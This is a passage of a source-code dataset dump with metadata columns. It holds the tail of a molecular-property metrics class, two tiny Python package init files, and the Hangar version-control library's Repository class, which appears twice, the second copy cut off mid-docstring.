self.tanimoto_cliff_rmse = calc_rmse(clf_ref, clf_prd)
if self.scaffold_cliff_compounds is not None:
# Subset only reference and predicted values of the cliff compounds, then calculate cliff rmse
clf_ref = [self.reference[idx] for idx, clf in enumerate(self.scaffold_cliff_compounds) if clf == 1]
clf_prd = [self.predictions[idx] for idx, clf in enumerate(self.scaffold_cliff_compounds) if clf == 1]
self.scaffold_cliff_rmse = calc_rmse(clf_ref, clf_prd)
if self.levenshtein_cliff_compounds is not None:
# Subset only reference and predicted values of the cliff compounds, then calculate cliff rmse
clf_ref = [self.reference[idx] for idx, clf in enumerate(self.levenshtein_cliff_compounds) if clf == 1]
clf_prd = [self.predictions[idx] for idx, clf in enumerate(self.levenshtein_cliff_compounds) if clf == 1]
self.levenshtein_cliff_rmse = calc_rmse(clf_ref, clf_prd)
if self.soft_consensus_cliff_compounds is not None:
# Subset only reference and predicted values of the cliff compounds, then calculate cliff rmse
clf_ref = [self.reference[idx] for idx, clf in enumerate(self.soft_consensus_cliff_compounds) if clf == 1]
clf_prd = [self.predictions[idx] for idx, clf in enumerate(self.soft_consensus_cliff_compounds) if clf == 1]
self.soft_consensus_cliff_rmse = calc_rmse(clf_ref, clf_prd)
return {'tanimoto_cliff_rmse': self.tanimoto_cliff_rmse, 'scaffold_cliff_rmse': self.scaffold_cliff_rmse,
'levenshtein_cliff_rmse': self.levenshtein_cliff_rmse,
'soft_consensus_cliff_rmse': self.soft_consensus_cliff_rmse}
def to_csv(self, filename, algorithm: Algorithms = None):
# Create output file if it doesnt exist
if self.data is not None:
if not os.path.isfile(filename):
with open(filename, 'w') as f:
f.write('dataset,'
'algorithm,'
'descriptor,'
'augmentation,'
'rmse,'
'cliff_rmse,'
'n_compounds,'
'n_cliff_compounds,'
'n_compounds_train,'
'n_cliff_compounds_train,'
'n_compounds_test,'
'n_cliff_compounds_test\n')
with open(filename, 'a') as f:
f.write(f'{self.data.name},'
f'{algorithm.value},'
f'{self.data.descriptor.value},'
f'{self.data.augmentation},'
f'{self.rmse},'
f'{self.soft_consensus_cliff_rmse},'
f'{self.data.cliffs.stats["n_compounds"]},'
f'{self.data.cliffs.stats["n_soft_consensus_cliff_compounds"]},'
f'{self.data.cliffs.stats["n_compounds_train"]},'
f'{self.data.cliffs.stats["n_soft_consensus_cliff_compounds_train"]},'
f'{self.data.cliffs.stats["n_compounds_test"]},'
f'{self.data.cliffs.stats["n_soft_consensus_cliff_compounds_test"]}\n')
def __repr__(self):
return f"RMSE: {self.rmse:.4f}\n" \
f"Q2F3: {self.q2f3:.4f}\n" \
f"AC-RMSE: {self.soft_consensus_cliff_rmse:.4f}\n"
| pt | 0.111068 | 2.543025 | 3 |
checkout/orders/__init__.py | accelero-cloud/tutorials | 2 | 13522 | <reponame>accelero-cloud/tutorials
from checkout.orders.order_service import Order, AuthorisationRequest
| from checkout.orders.order_service import Order, AuthorisationRequest | none | 1 | 1.117923 | 1 |
hiisi/__init__.py | ritvje/hiisi | 0 | 13523 | from .hiisi import HiisiHDF
from .odim import OdimPVOL, OdimCOMP
__version__ = "0.0.6"
| from .hiisi import HiisiHDF
from .odim import OdimPVOL, OdimCOMP
__version__ = "0.0.6"
| none | 1 | 1.053539 | 1 |
src/hangar/repository.py | jjmachan/hangar-py | 0 | 13524 | from pathlib import Path
import weakref
import warnings
from typing import Union, Optional, List
from .merger import select_merge_algorithm
from .constants import DIR_HANGAR
from .remotes import Remotes
from .context import Environments
from .diagnostics import ecosystem, integrity
from .records import heads, parsing, summarize, vcompat, commiting
from .checkout import ReaderCheckout, WriterCheckout
from .diff import DiffAndConflicts, ReaderUserDiff
from .utils import (
is_valid_directory_path,
is_suitable_user_key,
is_ascii,
folder_size,
format_bytes
)
class Repository(object):
"""Launching point for all user operations in a Hangar repository.
All interaction, including the ability to initialize a repo, checkout a
commit (for either reading or writing), create a branch, merge branches, or
generally view the contents or state of the local repository starts here.
Just provide this class instance with a path to an existing Hangar
repository, or to a directory one should be initialized, and all required
data for starting your work on the repo will automatically be populated.
>>> from hangar import Repository
>>> repo = Repository('foo/path/to/dir')
Parameters
----------
path : Union[str, os.PathLike]
local directory path where the Hangar repository exists (or initialized)
exists : bool, optional
True if a Hangar repository should exist at the given directory path.
Should no Hangar repository exists at that location, a UserWarning will
be raised indicating that the :meth:`init` method needs to be called.
False if the provided path does not need to (but optionally can) contain a
Hangar repository. if a Hangar repository does not exist at that path, the
usual UserWarning will be suppressed.
In both cases, the path must exist and the user must have sufficient OS
permissions to write to that location. Default = True
"""
def __init__(self, path: Union[str, Path], exists: bool = True):
if isinstance(path, (str, bytes)):
path = Path(path)
try:
usr_path = is_valid_directory_path(path)
except (TypeError, NotADirectoryError, PermissionError) as e:
raise e from None
repo_pth = usr_path.joinpath(DIR_HANGAR)
if exists is False:
with warnings.catch_warnings():
warnings.simplefilter('ignore', UserWarning)
envs = Environments(pth=repo_pth)
else:
envs = Environments(pth=repo_pth)
self._repo_path: Path = repo_pth
self._env: Environments = envs
self._remote: Remotes = Remotes(self._env)
def _repr_pretty_(self, p, cycle):
"""provide a pretty-printed repr for ipython based user interaction.
Parameters
----------
p : printer
io stream printer type object which is provided via ipython
cycle : bool
if the pretty-printer detects a cycle or infinite loop. Not a
concern here since we just output the text and return, no looping
required.
"""
self.__verify_repo_initialized()
res = f'Hangar {self.__class__.__name__}\
\n Repository Path : {self.path}\
\n Writer-Lock Free : {heads.writer_lock_held(self._env.branchenv)}\n'
p.text(res)
def __repr__(self):
"""Override the default repr to show useful information to developers.
Note: the pprint repr (ipython enabled) is separately defined in
:py:meth:`_repr_pretty_`. We specialize because we assume that anyone
operating in a terminal-based interpreter is probably a more advanced
developer-type, and expects traditional repr information instead of a
user facing summary of the repo. Though if we're wrong, go ahead and
feel free to reassign the attribute :) won't hurt our feelings, promise.
Returns
-------
string
formatted representation of the object
"""
res = f'{self.__class__}(path={self._repo_path})'
return res
def __verify_repo_initialized(self):
"""Internal method to verify repo initialized before operations occur
Raises
------
RuntimeError
If the repository db environments have not been initialized at the
specified repo path.
"""
if not self._env.repo_is_initialized:
msg = f'Repository at path: {self._repo_path} has not been initialized. '\
f'Please run the `init_repo()` function'
raise RuntimeError(msg)
@property
def remote(self) -> Remotes:
"""Accessor to the methods controlling remote interactions.
.. seealso::
:class:`Remotes` for available methods of this property
Returns
-------
Remotes
Accessor object methods for controlling remote interactions.
"""
proxy = weakref.proxy(self._remote)
return proxy
@property
def path(self) -> str:
"""Return the path to the repository on disk, read-only attribute
Returns
-------
str
path to the specified repository, not including `.hangar` directory
"""
self.__verify_repo_initialized()
return str(self._repo_path.parent)
@property
def writer_lock_held(self) -> bool:
"""Check if the writer lock is currently marked as held. Read-only attribute.
Returns
-------
bool
True is writer-lock is held, False if writer-lock is free.
"""
self.__verify_repo_initialized()
return not heads.writer_lock_held(self._env.branchenv)
@property
def version(self) -> str:
"""Find the version of Hangar software the repository is written with
Returns
-------
str
semantic version of major, minor, micro version of repo software version.
"""
self.__verify_repo_initialized()
res = vcompat.get_repository_software_version_spec(self._env.branchenv)
return str(res)
@property
def initialized(self) -> bool:
"""
Check if the repository has been initialized or not
Returns
-------
bool
True if repository has been initialized.
"""
return self._env.repo_is_initialized
@property
def size_nbytes(self) -> int:
"""Disk space used by the repository returned in number of bytes.
>>> repo.size_nbytes
1234567890
>>> print(type(repo.size_nbytes))
<class 'int'>
Returns
-------
int
number of bytes used by the repository on disk.
"""
self.__verify_repo_initialized()
return folder_size(self._repo_path, recurse=True)
@property
def size_human(self) -> str:
"""Disk space used by the repository returned in human readable string.
>>> repo.size_human
'1.23 GB'
>>> print(type(repo.size_human))
<class 'str'>
Returns
-------
str
disk space used by the repository formated in human readable text.
"""
self.__verify_repo_initialized()
nbytes = folder_size(self._repo_path, recurse=True)
return format_bytes(nbytes)
def checkout(self,
write: bool = False,
*,
branch: str = '',
commit: str = '') -> Union[ReaderCheckout, WriterCheckout]:
"""Checkout the repo at some point in time in either `read` or `write` mode.
Only one writer instance can exist at a time. Write enabled checkout
must must create a staging area from the ``HEAD`` commit of a branch. On
the contrary, any number of reader checkouts can exist at the same time
and can specify either a branch name or a commit hash.
Parameters
----------
write : bool, optional
Specify if the checkout is write capable, defaults to False
branch : str, optional
name of the branch to checkout. This utilizes the state of the repo
as it existed at the branch ``HEAD`` commit when this checkout object
was instantiated, defaults to ''
commit : str, optional
specific hash of a commit to use for the checkout (instead of a
branch ``HEAD`` commit). This argument takes precedent over a branch
name parameter if it is set. Note: this only will be used in
non-writeable checkouts, defaults to ''
Raises
------
ValueError
If the value of `write` argument is not boolean
ValueError
If ``commit`` argument is set to any value when ``write=True``.
Only ``branch`` argument is allowed.
Returns
-------
Union[ReaderCheckout, WriterCheckout]
Checkout object which can be used to interact with the repository
data
"""
self.__verify_repo_initialized()
try:
if write is True:
if commit != '':
raise ValueError(
f'Only `branch` argument can be set if `write=True`. '
f'Setting `commit={commit}` not allowed.')
if branch == '':
branch = heads.get_staging_branch_head(self._env.branchenv)
co = WriterCheckout(
repo_pth=self._repo_path,
branch_name=branch,
hashenv=self._env.hashenv,
refenv=self._env.refenv,
stageenv=self._env.stageenv,
branchenv=self._env.branchenv,
stagehashenv=self._env.stagehashenv)
return co
elif write is False:
commit_hash = self._env.checkout_commit(
branch_name=branch, commit=commit)
co = ReaderCheckout(
base_path=self._repo_path,
dataenv=self._env.cmtenv[commit_hash],
hashenv=self._env.hashenv,
branchenv=self._env.branchenv,
refenv=self._env.refenv,
commit=commit_hash)
return co
else:
raise ValueError("Argument `write` only takes True or False as value")
except (RuntimeError, ValueError) as e:
raise e from None
def clone(self, user_name: str, user_email: str, remote_address: str,
*, remove_old: bool = False) -> str:
"""Download a remote repository to the local disk.
The clone method implemented here is very similar to a `git clone`
operation. This method will pull all commit records, history, and data
which are parents of the remote's `master` branch head commit. If a
:class:`Repository` exists at the specified directory,
the operation will fail.
Parameters
----------
user_name : str
Name of the person who will make commits to the repository. This
information is recorded permanently in the commit records.
user_email : str
Email address of the repository user. This information is recorded
permanently in any commits created.
remote_address : str
location where the
:class:`hangar.remote.server.HangarServer` process is
running and accessible by the clone user.
remove_old : bool, optional, kwarg only
DANGER! DEVELOPMENT USE ONLY! If enabled, a
:class:`hangar.repository.Repository` existing on disk at the same
path as the requested clone location will be completely removed and
replaced with the newly cloned repo. (the default is False, which
will not modify any contents on disk and which will refuse to create
a repository at a given location if one already exists there.)
Returns
-------
str
Name of the master branch for the newly cloned repository.
"""
self.init(user_name=user_name, user_email=user_email, remove_old=remove_old)
self._remote.add(name='origin', address=remote_address)
branch = self._remote.fetch(remote='origin', branch='master')
HEAD = heads.get_branch_head_commit(self._env.branchenv, branch_name=branch)
heads.set_branch_head_commit(self._env.branchenv, 'master', HEAD)
with warnings.catch_warnings(record=False):
warnings.simplefilter('ignore', category=UserWarning)
co = self.checkout(write=True, branch='master')
co.reset_staging_area()
co.close()
return 'master'
def init(self,
user_name: str,
user_email: str,
*,
remove_old: bool = False) -> str:
"""Initialize a Hangar repository at the specified directory path.
This function must be called before a checkout can be performed.
Parameters
----------
user_name : str
Name of the repository user account.
user_email : str
Email address of the repository user account.
remove_old : bool, kwarg-only
DEVELOPER USE ONLY -- remove and reinitialize a Hangar
repository at the given path, Default = False
Returns
-------
str
the full directory path where the Hangar repository was
initialized on disk.
"""
pth = self._env.init_repo(user_name=user_name,
user_email=user_email,
remove_old=remove_old)
return str(pth)
def log(self,
branch: str = None,
commit: str = None,
*,
return_contents: bool = False,
show_time: bool = False,
show_user: bool = False) -> Optional[dict]:
"""Displays a pretty printed commit log graph to the terminal.
.. note::
For programatic access, the return_contents value can be set to true
which will retrieve relevant commit specifications as dictionary
elements.
Parameters
----------
branch : str, optional
The name of the branch to start the log process from. (Default value
= None)
commit : str, optional
The commit hash to start the log process from. (Default value = None)
return_contents : bool, optional, kwarg only
If true, return the commit graph specifications in a dictionary
suitable for programatic access/evaluation.
show_time : bool, optional, kwarg only
If true and return_contents is False, show the time of each commit
on the printed log graph
show_user : bool, optional, kwarg only
If true and return_contents is False, show the committer of each
commit on the printed log graph
Returns
-------
Optional[dict]
Dict containing the commit ancestor graph, and all specifications.
"""
self.__verify_repo_initialized()
res = summarize.log(branchenv=self._env.branchenv,
refenv=self._env.refenv,
branch=branch,
commit=commit,
return_contents=return_contents,
show_time=show_time,
show_user=show_user)
return res
def summary(self, *, branch: str = '', commit: str = '') -> None:
"""Print a summary of the repository contents to the terminal
Parameters
----------
branch : str, optional
A specific branch name whose head commit will be used as the summary
point (Default value = '')
commit : str, optional
A specific commit hash which should be used as the summary point.
(Default value = '')
"""
self.__verify_repo_initialized()
ppbuf = summarize.summary(self._env, branch=branch, commit=commit)
print(ppbuf.getvalue())
return None
def _details(self, *, line_limit=100, line_length=100) -> None: # pragma: no cover
"""DEVELOPER USE ONLY: Dump some details about the underlying db structure to disk.
"""
print(summarize.details(
self._env.branchenv, line_limit=line_limit, line_length=line_length).getvalue())
print(summarize.details(
self._env.refenv, line_limit=line_limit, line_length=line_length).getvalue())
print(summarize.details(
self._env.hashenv, line_limit=line_limit, line_length=line_length).getvalue())
print(summarize.details(
self._env.stageenv, line_limit=line_limit, line_length=line_length).getvalue())
print(summarize.details(
self._env.stagehashenv, line_limit=line_limit, line_length=line_length).getvalue())
for commit, commitenv in self._env.cmtenv.items():
print(summarize.details(
commitenv, line_limit=line_limit, line_length=line_length).getvalue())
return
def _ecosystem_details(self) -> dict:
"""DEVELOPER USER ONLY: log and return package versions on the system.
"""
eco = ecosystem.get_versions()
return eco
def diff(self, master: str, dev: str) -> DiffAndConflicts:
"""Calculate diff between master and dev branch/commits.
Diff is calculated as if we are to merge "dev" into "master"
Parameters
----------
master: str
branch name or commit hash digest to use as the "master" which
changes made in "dev" are compared to.
dev: str
branch name or commit hash digest to use as the "dev"
(ie. "feature") branch which changes have been made to
which are to be compared to the contents of "master".
Returns
-------
DiffAndConflicts
Standard output diff structure.
"""
current_branches = self.list_branches()
# assert branch / commit specified by "master" exists and
# standardize into "digest" rather than "branch name" arg type
if master in current_branches:
masterHEAD = heads.get_branch_head_commit(
branchenv=self._env.branchenv, branch_name=master)
else:
cmtExists = commiting.check_commit_hash_in_history(
refenv=self._env.refenv, commit_hash=master)
if not cmtExists:
raise ValueError(f'`master` {master} is not valid branch/commit.')
masterHEAD = master
# same check & transform for "dev" branch/commit arg.
if dev in current_branches:
devHEAD = heads.get_branch_head_commit(
branchenv=self._env.branchenv, branch_name=dev)
else:
cmtExists = commiting.check_commit_hash_in_history(
refenv=self._env.refenv, commit_hash=dev)
if not cmtExists:
raise ValueError(f'`dev` {dev} is not valid branch/commit.')
devHEAD = dev
# create differ object and generate results...
diff = ReaderUserDiff(commit_hash=masterHEAD,
branchenv=self._env.branchenv,
refenv=self._env.refenv)
res = diff.commit(dev_commit_hash=devHEAD)
return res
def merge(self, message: str, master_branch: str, dev_branch: str) -> str:
"""Perform a merge of the changes made on two branches.
Parameters
----------
message: str
Commit message to use for this merge.
master_branch : str
name of the master branch to merge into
dev_branch : str
name of the dev/feature branch to merge
Returns
-------
str
Hash of the commit which is written if possible.
"""
self.__verify_repo_initialized()
commit_hash = select_merge_algorithm(
message=message,
branchenv=self._env.branchenv,
stageenv=self._env.stageenv,
refenv=self._env.refenv,
stagehashenv=self._env.stagehashenv,
master_branch=master_branch,
dev_branch=dev_branch,
repo_path=self._repo_path)
return commit_hash
def create_branch(self, name: str, base_commit: str = None) -> heads.BranchHead:
"""create a branch with the provided name from a certain commit.
If no base commit hash is specified, the current writer branch ``HEAD``
commit is used as the ``base_commit`` hash for the branch. Note that
creating a branch does not actually create a checkout object for
interaction with the data. to interact you must use the repository
checkout method to properly initialize a read (or write) enabled
checkout object.
>>> from hangar import Repository
>>> repo = Repository('foo/path/to/dir')
>>> repo.create_branch('testbranch')
BranchHead(name='testbranch', digest='b66b...a8cc')
>>> repo.list_branches()
['master', 'testbranch']
>>> co = repo.checkout(write=True, branch='testbranch')
>>> # add data ...
>>> newDigest = co.commit('added some stuff')
>>> repo.create_branch('new-changes', base_commit=newDigest)
BranchHead(name='new-changes', digest='35kd...3254')
>>> repo.list_branches()
['master', 'new-changes', 'testbranch']
Parameters
----------
name : str
name to assign to the new branch
base_commit : str, optional
commit hash to start the branch root at. if not specified, the
writer branch ``HEAD`` commit at the time of execution will be used,
defaults to None
Returns
-------
:class:`~.heads.BranchHead`
NamedTuple[str, str] with fields for ``name`` and ``digest`` of the
branch created (if the operation was successful)
Raises
------
ValueError
If the branch name provided contains characters outside of alpha-numeric
ascii characters and ".", "_", "-" (no whitespace), or is > 64 characters.
ValueError
If the branch already exists.
RuntimeError
If the repository does not have at-least one commit on the "default"
(ie. ``master``) branch.
"""
self.__verify_repo_initialized()
if (not is_ascii(name)) or (not is_suitable_user_key(name)):
err = ValueError(
f'Branch name provided: {name} invalid. Must contain only alpha-numeric '
f'or "." "_" "-" ascii characters. And be <= 64 Characters')
raise err from None
createdBranch = heads.create_branch(
branchenv=self._env.branchenv,
name=name,
base_commit=base_commit)
return createdBranch
def remove_branch(self, name: str, *, force_delete: bool = False) -> heads.BranchHead:
"""Permanently delete a branch pointer from the repository history.
Since a branch (by definition) is the name associated with the HEAD
commit of a historical path, the default behavior of this method is to
throw an exception (no-op) should the ``HEAD`` not be referenced as an
ancestor (or at least as a twin) of a separate branch which is
currently *ALIVE*. If referenced in another branch's history, we are
assured that all changes have been merged and recorded, and that this
pointer can be safely deleted without risk of damage to historical
provenance or (eventual) loss to garbage collection.
>>> from hangar import Repository
>>> repo = Repository('foo/path/to/dir')
>>> repo.create_branch('first-testbranch')
BranchHead(name='first-testbranch', digest='9785...56da')
>>> repo.create_branch('second-testbranch')
BranchHead(name='second-testbranch', digest='9785...56da')
>>> repo.list_branches()
['master', 'first-testbranch', 'second-testbranch']
>>> # Make a commit to advance a branch
>>> co = repo.checkout(write=True, branch='first-testbranch')
>>> # add data ...
>>> co.commit('added some stuff')
'3l253la5hna3k3a553256nak35hq5q534kq35532'
>>> co.close()
>>> repo.remove_branch('second-testbranch')
BranchHead(name='second-testbranch', digest='9785...56da')
A user may manually specify to delete an un-merged branch, in which
case the ``force_delete`` keyword-only argument should be set to
``True``.
>>> # check out master and try to remove 'first-testbranch'
>>> co = repo.checkout(write=True, branch='master')
>>> co.close()
>>> repo.remove_branch('first-testbranch')
Traceback (most recent call last):
...
RuntimeError: ("The branch first-testbranch is not fully merged. "
"If you are sure you want to delete it, re-run with "
"force-remove parameter set.")
>>> # Now set the `force_delete` parameter
>>> repo.remove_branch('first-testbranch', force_delete=True)
BranchHead(name='first-testbranch', digest='9785...56da')
It is important to note that *while this method will handle all safety
checks, argument validation, and performs the operation to permanently
delete a branch name/digest pointer, **no commit refs along the history
will be deleted from the Hangar database**.* Most of the history contains
commit refs which must be safe in other branch histories, and recent
commits may have been used as the base for some new history. As such, even
if some of the latest commits leading up to a deleted branch ``HEAD`` are
orphaned (unreachable), the records (and all data added in those commits)
will remain on the disk.
In the future, we intend to implement a garbage collector which will remove
orphan commits which have not been modified for some set amount of time
(probably on the order of a few months), but this is not implemented at the
moment.
Should an accidental forced branch deletion occur, *it is possible to
recover* and create a new branch head pointing to the same commit. If
the commit digest of the removed branch ``HEAD`` is known, its as simple as
specifying a name and the ``base_digest`` in the normal
:meth:`create_branch` method. If the digest is unknown, it will be a
bit more work, but some of the developer facing introspection tools /
routines could be used to either manually or (with minimal effort)
programmatically find the orphan commit candidates. If you find
yourself having accidentally deleted a branch, and must get it back,
please reach out on the `Github Issues
<https://github.com/tensorwerk/hangar-py/issues>`__ page. We'll gladly
explain more in depth and walk you through the process in any way we
can help!
Parameters
----------
name : str
name of the branch which should be deleted. This branch must exist, and
cannot refer to a remote tracked branch (ie. origin/devbranch), please
see exception descriptions for other parameters determining validity of
argument
force_delete : bool, optional
If True, remove the branch pointer even if the changes are un-merged in
other branch histories. May result in orphaned commits which may be
time-consuming to recover if needed, by default False
Returns
-------
:class:`~.heads.BranchHead`
NamedTuple[str, str] with fields for `name` and `digest` of the branch
pointer deleted.
Raises
------
ValueError
If a branch with the provided name does not exist locally
PermissionError
If removal of the branch would result in a repository with zero local
branches.
PermissionError
If a write enabled checkout is holding the writer-lock at time of this
call.
PermissionError
If the branch to be removed was the last used in a write-enabled
checkout, and whose contents form the base of the staging area.
RuntimeError
If the branch has not been fully merged into other branch histories,
and ``force_delete`` option is not ``True``.
"""
self.__verify_repo_initialized()
res = heads.remove_branch(branchenv=self._env.branchenv,
refenv=self._env.refenv,
name=name,
force_delete=force_delete)
return res
def list_branches(self) -> List[str]:
"""list all branch names created in the repository.
Returns
-------
List[str]
the branch names recorded in the repository
"""
self.__verify_repo_initialized()
branches = heads.get_branch_names(self._env.branchenv)
return branches
def verify_repo_integrity(self) -> bool:
"""Verify the integrity of the repository data on disk.
Runs a full cryptographic verification of repository contents in order
to ensure the integrity of all data and history recorded on disk.
.. note::
This proof may take a significant amount of time to run for
repositories which:
1. store significant quantities of data on disk.
2. have a very large number of commits in their history.
As a brief explanation for why these are the driving factors behind
processing time:
1. Every single piece of data in the repositories history must be read
from disk, cryptographically hashed, and compared to the expected
value. There is no exception to this rule; regardless of when a piece
of data was added / removed from an column, or for how many (or how
few) commits some sample exists in. The integrity of the commit tree at
any point after some piece of data is added to the repo can only be
validated if it - and all earlier data pieces - are proven to be intact
and unchanged.
Note: This does not mean that the verification is repeatedly
performed for every commit some piece of data is stored in. Each
data piece is read from disk and verified only once, regardless of
how many commits some piece of data is referenced in.
2. Each commit reference (defining names / contents of a commit) must be
decompressed and parsed into a usable data structure. We scan across
all data digests referenced in the commit and ensure that the
corresponding data piece is known to hangar (and validated as
unchanged). The commit refs (along with the corresponding user records,
message, and parent map), are then re-serialized and cryptographically
hashed for comparison to the expected value. While this process is
fairly efficient for a single commit, it must be repeated for each
commit in the repository history, and may take a non-trivial amount of
time for repositories with thousands of commits.
While the two points above are the most time consuming operations,
there are many more checks which are performed alongside them as part
of the full verification run.
Returns
-------
bool
True if integrity verification is successful, otherwise False; in
this case, a message describing the offending component will be
printed to stdout.
"""
self.__verify_repo_initialized()
heads.acquire_writer_lock(self._env.branchenv, 'VERIFY_PROCESS')
try:
integrity.run_verification(
branchenv=self._env.branchenv,
hashenv=self._env.hashenv,
refenv=self._env.refenv,
repo_path=self._env.repo_path)
finally:
heads.release_writer_lock(self._env.branchenv, 'VERIFY_PROCESS')
return True
def force_release_writer_lock(self) -> bool:
"""Force release the lock left behind by an unclosed writer-checkout
.. warning::
*NEVER USE THIS METHOD IF WRITER PROCESS IS CURRENTLY ACTIVE.* At the time
of writing, the implications of improper/malicious use of this are not
understood, and there is a a risk of of undefined behavior or (potentially)
data corruption.
At the moment, the responsibility to close a write-enabled checkout is
placed entirely on the user. If the `close()` method is not called
before the program terminates, a new checkout with write=True will fail.
The lock can only be released via a call to this method.
.. note::
This entire mechanism is subject to review/replacement in the future.
Returns
-------
bool
if the operation was successful.
"""
self.__verify_repo_initialized()
forceReleaseSentinal = parsing.repo_writer_lock_force_release_sentinal()
success = heads.release_writer_lock(self._env.branchenv, forceReleaseSentinal)
return success
| from pathlib import Path
import weakref
import warnings
from typing import Union, Optional, List
from .merger import select_merge_algorithm
from .constants import DIR_HANGAR
from .remotes import Remotes
from .context import Environments
from .diagnostics import ecosystem, integrity
from .records import heads, parsing, summarize, vcompat, commiting
from .checkout import ReaderCheckout, WriterCheckout
from .diff import DiffAndConflicts, ReaderUserDiff
from .utils import (
is_valid_directory_path,
is_suitable_user_key,
is_ascii,
folder_size,
format_bytes
)
class Repository(object):
"""Launching point for all user operations in a Hangar repository.
All interaction, including the ability to initialize a repo, checkout a
commit (for either reading or writing), create a branch, merge branches, or
generally view the contents or state of the local repository starts here.
Just provide this class instance with a path to an existing Hangar
repository, or to a directory one should be initialized, and all required
data for starting your work on the repo will automatically be populated.
>>> from hangar import Repository
>>> repo = Repository('foo/path/to/dir')
Parameters
----------
path : Union[str, os.PathLike]
local directory path where the Hangar repository exists (or initialized)
exists : bool, optional
True if a Hangar repository should exist at the given directory path.
Should no Hangar repository exists at that location, a UserWarning will
be raised indicating that the :meth:`init` method needs to be called.
False if the provided path does not need to (but optionally can) contain a
Hangar repository. if a Hangar repository does not exist at that path, the
usual UserWarning will be suppressed.
In both cases, the path must exist and the user must have sufficient OS
permissions to write to that location. Default = True
"""
def __init__(self, path: Union[str, Path], exists: bool = True):
if isinstance(path, (str, bytes)):
path = Path(path)
try:
usr_path = is_valid_directory_path(path)
except (TypeError, NotADirectoryError, PermissionError) as e:
raise e from None
repo_pth = usr_path.joinpath(DIR_HANGAR)
if exists is False:
with warnings.catch_warnings():
warnings.simplefilter('ignore', UserWarning)
envs = Environments(pth=repo_pth)
else:
envs = Environments(pth=repo_pth)
self._repo_path: Path = repo_pth
self._env: Environments = envs
self._remote: Remotes = Remotes(self._env)
def _repr_pretty_(self, p, cycle):
"""provide a pretty-printed repr for ipython based user interaction.
Parameters
----------
p : printer
io stream printer type object which is provided via ipython
cycle : bool
if the pretty-printer detects a cycle or infinite loop. Not a
concern here since we just output the text and return, no looping
required.
"""
self.__verify_repo_initialized()
res = f'Hangar {self.__class__.__name__}\
\n Repository Path : {self.path}\
\n Writer-Lock Free : {heads.writer_lock_held(self._env.branchenv)}\n'
p.text(res)
def __repr__(self):
"""Override the default repr to show useful information to developers.
Note: the pprint repr (ipython enabled) is separately defined in
:py:meth:`_repr_pretty_`. We specialize because we assume that anyone
operating in a terminal-based interpreter is probably a more advanced
developer-type, and expects traditional repr information instead of a
user facing summary of the repo. Though if we're wrong, go ahead and
feel free to reassign the attribute :) won't hurt our feelings, promise.
Returns
-------
string
formatted representation of the object
"""
res = f'{self.__class__}(path={self._repo_path})'
return res
def __verify_repo_initialized(self):
"""Internal method to verify repo initialized before operations occur
Raises
------
RuntimeError
If the repository db environments have not been initialized at the
specified repo path.
"""
if not self._env.repo_is_initialized:
msg = f'Repository at path: {self._repo_path} has not been initialized. '\
f'Please run the `init_repo()` function'
raise RuntimeError(msg)
@property
def remote(self) -> Remotes:
"""Accessor to the methods controlling remote interactions.
.. seealso::
:class:`Remotes` for available methods of this property
Returns
-------
Remotes
Accessor object methods for controlling remote interactions.
"""
proxy = weakref.proxy(self._remote)
return proxy
@property
def path(self) -> str:
"""Return the path to the repository on disk, read-only attribute
Returns
-------
str
path to the specified repository, not including `.hangar` directory
"""
self.__verify_repo_initialized()
return str(self._repo_path.parent)
@property
def writer_lock_held(self) -> bool:
"""Check if the writer lock is currently marked as held. Read-only attribute.
Returns
-------
bool
True is writer-lock is held, False if writer-lock is free.
"""
self.__verify_repo_initialized()
return not heads.writer_lock_held(self._env.branchenv)
@property
def version(self) -> str:
"""Find the version of Hangar software the repository is written with
Returns
-------
str
semantic version of major, minor, micro version of repo software version.
"""
self.__verify_repo_initialized()
res = vcompat.get_repository_software_version_spec(self._env.branchenv)
return str(res)
@property
def initialized(self) -> bool:
"""
Check if the repository has been initialized or not
Returns
-------
bool
True if repository has been initialized.
"""
return self._env.repo_is_initialized
@property
def size_nbytes(self) -> int:
"""Disk space used by the repository returned in number of bytes.
>>> repo.size_nbytes
1234567890
>>> print(type(repo.size_nbytes))
<class 'int'>
Returns
-------
int
number of bytes used by the repository on disk.
"""
self.__verify_repo_initialized()
return folder_size(self._repo_path, recurse=True)
@property
def size_human(self) -> str:
"""Disk space used by the repository returned in human readable string.
>>> repo.size_human
'1.23 GB'
>>> print(type(repo.size_human))
<class 'str'>
Returns
-------
str
disk space used by the repository formated in human readable text.
"""
self.__verify_repo_initialized()
nbytes = folder_size(self._repo_path, recurse=True)
return format_bytes(nbytes)
def checkout(self,
write: bool = False,
*,
branch: str = '',
commit: str = '') -> Union[ReaderCheckout, WriterCheckout]:
"""Checkout the repo at some point in time in either `read` or `write` mode.
Only one writer instance can exist at a time. Write enabled checkout
must must create a staging area from the ``HEAD`` commit of a branch. On
the contrary, any number of reader checkouts can exist at the same time
and can specify either a branch name or a commit hash.
Parameters
----------
write : bool, optional
Specify if the checkout is write capable, defaults to False
branch : str, optional
name of the branch to checkout. This utilizes the state of the repo
as it existed at the branch ``HEAD`` commit when this checkout object
was instantiated, defaults to ''
commit : str, optional
specific hash of a commit to use for the checkout (instead of a
branch ``HEAD`` commit). This argument takes precedent over a branch
name parameter if it is set. Note: this only will be used in
non-writeable checkouts, defaults to ''
Raises
------
ValueError
If the value of `write` argument is not boolean
ValueError
If ``commit`` argument is set to any value when ``write=True``.
Only ``branch`` argument is allowed.
Returns
-------
Union[ReaderCheckout, WriterCheckout]
Checkout object which can be used to interact with the repository
data
"""
self.__verify_repo_initialized()
try:
if write is True:
if commit != '':
raise ValueError(
f'Only `branch` argument can be set if `write=True`. '
f'Setting `commit={commit}` not allowed.')
if branch == '':
branch = heads.get_staging_branch_head(self._env.branchenv)
co = WriterCheckout(
repo_pth=self._repo_path,
branch_name=branch,
hashenv=self._env.hashenv,
refenv=self._env.refenv,
stageenv=self._env.stageenv,
branchenv=self._env.branchenv,
stagehashenv=self._env.stagehashenv)
return co
elif write is False:
commit_hash = self._env.checkout_commit(
branch_name=branch, commit=commit)
co = ReaderCheckout(
base_path=self._repo_path,
dataenv=self._env.cmtenv[commit_hash],
hashenv=self._env.hashenv,
branchenv=self._env.branchenv,
refenv=self._env.refenv,
commit=commit_hash)
return co
else:
raise ValueError("Argument `write` only takes True or False as value")
except (RuntimeError, ValueError) as e:
raise e from None
def clone(self, user_name: str, user_email: str, remote_address: str,
*, remove_old: bool = False) -> str:
"""Download a remote repository to the local disk.
The clone method implemented here is very similar to a `git clone`
operation. This method will pull all commit records, history, and data
which are parents of the remote's `master` branch head commit. If a
